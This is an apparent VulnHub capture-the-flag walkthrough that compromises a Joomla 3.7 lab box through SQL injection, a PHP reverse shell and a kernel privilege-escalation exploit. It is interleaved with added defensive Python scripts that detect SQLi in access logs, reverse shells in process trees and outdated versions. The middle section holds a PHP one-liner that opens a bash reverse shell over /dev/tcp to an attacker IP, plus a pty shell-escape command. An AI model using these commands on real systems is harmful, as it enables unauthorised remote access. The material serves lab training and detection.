There is only one flag, and it can be read only as root. The location of such flags is just an indicator of where a good penetration tester should look. An alternative approach would be to go directly for root.
Blog notes:
- Attacker machine: I used a Kali Linux machine for all my attack labs.
- Victim machine: it is available on VulnHub; please follow the link above.
- Enumeration: listing and searching for information, i.e. learning more about the victim machine. It is a very general term: lists of users, directories, open ports, vulnerabilities.
- Points of privilege escalation: a list of methods and techniques for privilege escalation. Instead of creating a list in text form, I have created a tool that automates privilege escalation and other penetration-testing steps, based on my own experience working on VulnHub labs.
Step 1 — Active Information Gathering
- Host discovery
- Port scanning
We learn that an HTTP service is running, so there must be a web page.
From the above image, we know that the website is built on the Joomla CMS. The first thing that comes to mind is web application penetration testing: there may be a tool on the internet designed for scanning Joomla applications for vulnerabilities, like WPScan for WordPress.
Step 2 — Vulnerability Scanning (Joomla)
- Nmap vuln NSE script
- Search for the versions of the frameworks and services running on the victim system.
Joomla is running at v3.7, which is vulnerable to an SQL injection exploit.
Step 3 — Exploitation
We could now get an overview from YouTube of how an SQL injection attack works using SQLMap.
In this way we can query the database. Note that the database stores passwords in hashed form, so our current aim should be to find that hash value.
Traversing through the database, we came across a password hash for the user "admin".
We also know that SSH is not running. If SSH had been running, we could have used the password hash directly to log in to the victim system.
At this point our aim is to get remote shell access to the victim system, but SSH is not running. Whatever technique we use, we cannot get a connection originating from outside into the victim system, so we need to find a method of generating a connection originating from inside the victim system to the outside. This can be achieved with a reverse shell, which can generally be created using any scripting language.
We also know that Joomla uses PHP, so it is logical to use a PHP script to create the reverse shell.
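From the defender's side, the same SQL injection activity leaves traces in the web server's access log. The following scanner is an added example, not code from the original post: it parses combined-format access log lines (the sample lines are constructed for the demo), URL-decodes each query string and flags generic injection indicators such as UNION SELECT, boolean tautologies, time-based functions and comment terminators, as well as requests whose User-Agent names the sqlmap scanner. The patterns are generic and not a signature for any particular Joomla bug.

```python
"""Flag probable SQL injection probes in web server access logs.

Added example (not from the original post). The log lines below are
constructed for the demo; the regexes are generic SQLi indicators.
"""
import re
from urllib.parse import unquote_plus

# Combined log format: ip - user [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Generic SQL injection indicators, matched against the URL-decoded query string.
SQLI_PATTERNS = {
    "union-select": re.compile(r"\bunion\b[\s/*]+(all[\s/*]+)?select\b", re.I),
    "boolean-tautology": re.compile(r"(['\"])\s*(or|and)\s+['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.I),
    "time-based": re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\s*\(", re.I),
    "error-based": re.compile(r"\b(extractvalue|updatexml|floor\s*\(\s*rand)\s*\(", re.I),
    "comment-terminator": re.compile(r"(--\s|#|/\*)"),
}
SCANNER_AGENTS = ("sqlmap",)


def parse_line(line):
    """Return a dict of fields for one combined-format line, or None if malformed."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_sqli_requests(lines):
    """Return a list of (ip, path, reasons) for requests that look like SQLi probes.

    A request is flagged if its decoded query string matches any SQLI_PATTERN
    or if its User-Agent names a known scanner.
    """
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"]
        query = path.split("?", 1)[1] if "?" in path else ""
        decoded = unquote_plus(query)
        reasons = [name for name, pat in SQLI_PATTERNS.items() if pat.search(decoded)]
        if any(agent in rec["agent"].lower() for agent in SCANNER_AGENTS):
            reasons.append("scanner-user-agent")
        if reasons:
            hits.append((rec["ip"], path, reasons))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?option=com_content&id=1%27%20UNION%20SELECT%201,2,3--%20 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?option=com_content&id=1%27%20OR%20%271%27=%271 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?option=com_content&id=1%20AND%20SLEEP(5) HTTP/1.1" 200 5123 "-" "sqlmap/1.7"',
    '10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /images/logo.png HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, reasons in find_sqli_requests(SAMPLE_LOG):
        print(f"{ip} {path} -> {', '.join(reasons)}")
```

On a real server, feed it the lines of the Apache or Nginx access log; a burst of flagged requests from one IP against the same parameter is the usual shape of an automated injection run.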
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.137.11/1234 0>&1'"); ?>
Or you could use a proper PHP reverse shell script.
On the attacker machine we also need to start a listener for the reverse shell. Once everything is configured properly, we get the output below.
Step 4 — Enumeration and Privilege Escalation (for cases where the remote shell is a restricted shell)
- Using the points of privilege escalation, we could try to find a more powerful shell if one is present. We could use the command below to list all available shells.
- There are many shell escape techniques for switching to a more powerful shell if one is present. Also check the PATH environment variable to make sure all the commands are available.
python -c 'import pty;pty.spawn("/bin/bash")'
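Both the PHP-spawned reverse shell from Step 3 and the pty upgrade above are visible on the victim in the process tree: the web server user ends up owning interactive shells, /dev/tcp redirections and a python process calling pty.spawn. The checker below is an added example, not code from the original post. It parses `ps -eo user,pid,ppid,args` style output (the listing here is constructed, not captured from a real host), flags those command-line indicators, and separately flags any shell or interpreter that a web-server user runs underneath a web server process. The user names www-data/apache/nginx and the server binaries apache2/httpd/nginx/php-fpm are assumptions about a typical Debian or Ubuntu setup.

```python
"""Spot reverse-shell indicators in a process listing.

Added example (not from the original post). The sample listing is constructed
to resemble `ps -eo user,pid,ppid,args` output on the lab's web server.
"""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "user pid ppid args")

# Command-line fragments that almost never appear in legitimate web-server children.
INDICATORS = {
    "dev-tcp-redirect": re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+"),
    "interactive-shell": re.compile(r"\b(ba|z|da)?sh\s+-i\b"),
    "pty-upgrade": re.compile(r"pty\.spawn\s*\("),
}
WEB_USERS = {"www-data", "apache", "nginx"}           # assumed web-server accounts
WEB_SERVER_BINS = ("apache2", "httpd", "nginx", "php-fpm")  # assumed server binaries
SHELLS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl", "php"}


def basename(args):
    """First word of a command line, without its directory part."""
    return args.split()[0].rsplit("/", 1)[-1]


def parse_ps(text):
    """Parse `ps -eo user,pid,ppid,args` style output; the header line is skipped."""
    procs = []
    for line in text.strip().splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        user, pid, ppid, args = parts
        procs.append(Proc(user, int(pid), int(ppid), args))
    return procs


def descends_from_web_server(proc, by_pid, max_depth=16):
    """True if any ancestor (up to max_depth levels) is a web server process."""
    cur = by_pid.get(proc.ppid)
    for _ in range(max_depth):
        if cur is None:
            return False
        if basename(cur.args).startswith(WEB_SERVER_BINS):
            return True
        cur = by_pid.get(cur.ppid)
    return False


def find_reverse_shell_indicators(procs):
    """Return (pid, user, reasons) for suspicious processes.

    Signal 1: the command line matches a known indicator.
    Signal 2: a web-server user owns a shell/interpreter under the web server,
    which is exactly how a PHP exec()-spawned shell appears.
    """
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        reasons = [name for name, pat in INDICATORS.items() if pat.search(p.args)]
        if (p.user in WEB_USERS and basename(p.args) in SHELLS
                and descends_from_web_server(p, by_pid)):
            reasons.append("shell-under-web-server")
        if reasons:
            findings.append((p.pid, p.user, reasons))
    return findings


# Constructed listing: an apache2 worker spawning the chain from the walkthrough.
SAMPLE_PS = """\
USER       PID  PPID ARGS
root         1     0 /sbin/init
root       812     1 /usr/sbin/apache2 -k start
www-data   830   812 /usr/sbin/apache2 -k start
www-data   901   830 sh -c /bin/bash -c 'bash -i >& /dev/tcp/192.168.137.11/1234 0>&1'
www-data   902   901 /bin/bash -c bash -i >& /dev/tcp/192.168.137.11/1234 0>&1
www-data   903   902 bash -i
www-data   910   903 python -c import pty;pty.spawn("/bin/bash")
www-data   911   910 /bin/bash
jerry     1200  1150 bash
root      1300     1 /usr/sbin/cron -f
"""

if __name__ == "__main__":
    for pid, user, reasons in find_reverse_shell_indicators(parse_ps(SAMPLE_PS)):
        print(f"pid {pid} ({user}): {', '.join(reasons)}")
```

The second signal is the more durable one: command-line strings can be obfuscated, but a shell whose ancestor is the web server is a structural anomaly regardless of what it was told to run. Pairing this with `ss -tnp` output (outbound connections owned by the same PIDs) confirms the reverse direction of the connection.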
Step 5 — Vulnerability Scanning (Linux)
- This could also be done before the previous steps, but enumeration and vulnerability scanning go hand in hand.
- Tools can be used for vulnerability scanning, but one should always start by checking which software is running and in which version. We try to find the vulnerability passively first; this is generally good practice.
- Checking the Linux version, we found that the system runs Ubuntu 16.04, which is vulnerable to a privilege escalation exploit.
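The passive approach recommended in Step 2 (note the Joomla version) and here (note the OS release) can be automated so that the inventory is collected consistently before any scanner runs. The script below is an added example, not code from the original post: it parses an /etc/os-release file and a Joomla package manifest, and compares what it finds against a baseline of minimum acceptable versions. The inputs are constructed for the demo; the manifest path administrator/manifests/files/joomla.xml and the baseline versions are assumptions, not authoritative advisory data.

```python
"""Passive version inventory: collect software versions before running any scanner.

Added example (not from the original post). On a real host the inputs would be
/etc/os-release and the CMS manifest (assumed here to be
administrator/manifests/files/joomla.xml); both samples below are constructed.
"""
import re
import xml.etree.ElementTree as ET


def parse_os_release(text):
    """Parse KEY=value lines of /etc/os-release into a dict (surrounding quotes stripped)."""
    info = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        info[key] = value.strip().strip('"').strip("'")
    return info


def parse_joomla_manifest(xml_text):
    """Return the <version> text from a Joomla package manifest, or None if absent."""
    root = ET.fromstring(xml_text)
    node = root.find("version")
    return node.text.strip() if node is not None and node.text else None


def version_tuple(version):
    """'3.7.0' -> (3, 7, 0); non-numeric parts are dropped so '16.04.3 LTS' still compares."""
    return tuple(int(x) for x in re.findall(r"\d+", version))


def is_below(found, minimum):
    """Lexicographic comparison of dotted versions: is_below('3.7', '3.7.1') is True."""
    return version_tuple(found) < version_tuple(minimum)


# Constructed baseline: the minimum versions this defender treats as acceptable.
BASELINE = {
    "joomla": "3.7.1",   # assumption for the demo
    "ubuntu": "18.04",   # assumption for the demo
}


def inventory(os_release_text, joomla_manifest_xml):
    """Return (component, found, minimum, outdated) rows for each recognised component."""
    osr = parse_os_release(os_release_text)
    rows = []
    distro = osr.get("ID", "unknown")
    distro_version = osr.get("VERSION_ID", "0")
    if distro in BASELINE:
        minimum = BASELINE[distro]
        rows.append((distro, distro_version, minimum, is_below(distro_version, minimum)))
    joomla_version = parse_joomla_manifest(joomla_manifest_xml)
    if joomla_version:
        minimum = BASELINE["joomla"]
        rows.append(("joomla", joomla_version, minimum, is_below(joomla_version, minimum)))
    return rows


# Constructed sample inputs (not copied from a real host).
SAMPLE_OS_RELEASE = """\
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.3 LTS"
VERSION_ID="16.04"
"""

SAMPLE_JOOMLA_XML = """\
<extension version="3.6" type="file" method="upgrade">
    <name>files_joomla</name>
    <version>3.7.0</version>
    <description>FILES_JOOMLA_XML_DESCRIPTION</description>
</extension>
"""

if __name__ == "__main__":
    for component, found, minimum, outdated in inventory(SAMPLE_OS_RELEASE, SAMPLE_JOOMLA_XML):
        state = "OUTDATED" if outdated else "ok"
        print(f"{component}: found {found}, minimum {minimum} -> {state}")
```

The numeric-only comparison is deliberately simple; it is enough for release strings like these, but for Debian package versions with epochs and tilde suffixes you would defer to `dpkg --compare-versions` instead.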
Step 6 — Privilege Escalation
- The exploit is in the form of a script, so we downloaded it.
- We then executed the exploit to get root access.
Finally we got root access. Traversing to the "/root" directory, we found our flag.
Important takeaways from this lab:
- We learned how to get remote access using a reverse shell when port 22 (SSH) is not open on the victim system.
- We learned how to search for vulnerabilities when the automated vulnerability scanner fails to find them. We first find the versions of the web application and the Linux OS and search for vulnerabilities in those versions passively before using automated tools. This is good practice.
- We learned how to execute PHP scripts (or scripts in any language) even without the proper rights. In this example only "admin" had the right to create PHP pages; "jerry" and "tom" were not allowed. But we found a way (using "preview of page") to run PHP scripts.